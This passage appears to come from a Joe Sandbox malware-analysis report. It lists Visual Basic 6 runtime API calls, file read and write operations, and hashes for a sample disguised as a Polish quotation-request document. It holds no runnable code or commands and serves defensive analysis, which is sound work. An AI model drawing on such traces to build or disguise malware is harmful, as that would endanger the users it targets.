                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00421A60
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 00421A75
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 00421A7C
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00421A9E
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00421ACB
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 00421AD2
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00421AE9
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00421AF0
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00421B1B
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(?,00000000), ref: 00421B26
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00421B36
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00421B43
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00421B72
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00421B7B
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BAA
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BB9
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BCD
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BDB
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BED
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BF8
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C51
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C5E
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C6E
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C7B
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CB9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CC4
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CD4
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CE1
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CF1
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CFE
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D20
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D27
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D56
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D65
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D79
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D87
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D97
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D9E
                                                                                                                                                                                                                                                      • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DB1
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DC5
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DD3
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DE5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DF0
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E49
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E56
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E66
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E73
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EB1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EBC
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ECC
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ED9
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EE9
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EF6
                                                                                                                                                                                                                                                      • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F10
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F25
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F2C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F3C
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F43
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004086A8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F59
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F64
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F71
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F87
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F96
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F9F
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00004008,00000000), ref: 00421FC5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00422028), ref: 00421FFD
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422006
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 0042200F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422018
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422021
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0042203F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                                                                                                                      • String ID: E
                                                                                                                                                                                                                                                      • API String ID: 1020712489-3568589458
                                                                                                                                                                                                                                                      • Opcode ID: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
                                                                                                                                                                                                                                                      • Instruction ID: 07c48357a9df06a9d6fdd80bdbc38809ff137e737b5eacf3c703d77614347229
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC22D571900248EBDB04DFE0EA4CBDEBB74FF48305F208169E602BB2A5DBB55A45CB14

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00422959
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000), ref: 004229A1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 004229EC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000), ref: 00422A80
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00422A8B
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00422AF4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
                                                                                                                                                                                                                                                      • #618.MSVBVM60(00000000), ref: 00422B1C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00422B27
                                                                                                                                                                                                                                                      • __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422B78
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00422BC1
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 00422BDE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1066637744-0
                                                                                                                                                                                                                                                      • Opcode ID: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
                                                                                                                                                                                                                                                      • Instruction ID: 321561c39fc04c0ddddefdb4371944f0511538a09f439f710ae93618e622a53c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A681D675D00248EFDB04EFA0EA48BDEBBB4FF48705F108169E612B72A0DB745A49CB54

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 004156D0: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
                                                                                                                                                                                                                                                        • Part of subcall function 004156D0: __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
                                                                                                                                                                                                                                                        • Part of subcall function 004156D0: __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
                                                                                                                                                                                                                                                        • Part of subcall function 004156D0: __vbaFreeStr.MSVBVM60 ref: 0041572D
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                      • #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                      • #609.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00415BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 00415BC0
                                                                                                                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 00415BDA
                                                                                                                                                                                                                                                      • #709.MSVBVM60(00000000,00406544,000000FF,00000000,?), ref: 00415C0F
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00415C1C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00415C27
                                                                                                                                                                                                                                                      • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 00415C3A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00415C45
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 00415C4C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00415C57
                                                                                                                                                                                                                                                      • #535.MSVBVM60(00000000), ref: 00415C5E
                                                                                                                                                                                                                                                      • __vbaStrR4.MSVBVM60 ref: 00415C68
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00415C73
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 00415C7A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00415C85
                                                                                                                                                                                                                                                      • __vbaNameFile.MSVBVM60(00000000), ref: 00415C8C
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000), ref: 00415CAC
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000000,004032B6), ref: 00415CBF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                                                                                                                      • String ID: yymmdd
                                                                                                                                                                                                                                                      • API String ID: 2807397001-2871001947
                                                                                                                                                                                                                                                      • Opcode ID: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
                                                                                                                                                                                                                                                      • Instruction ID: da5027675b2f5c6fcc5daed963e92fc9253badbc1f1ecd6ba165b842c6da7c45
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48511D75900208EFDB04DF94D948BDEBBB8FF48305F108569F506BB2A0DB745A48CB94

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
                                                                                                                                                                                                                                                      • SHGetPathFromIDList.SHELL32(?,00000000), ref: 00429D30
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
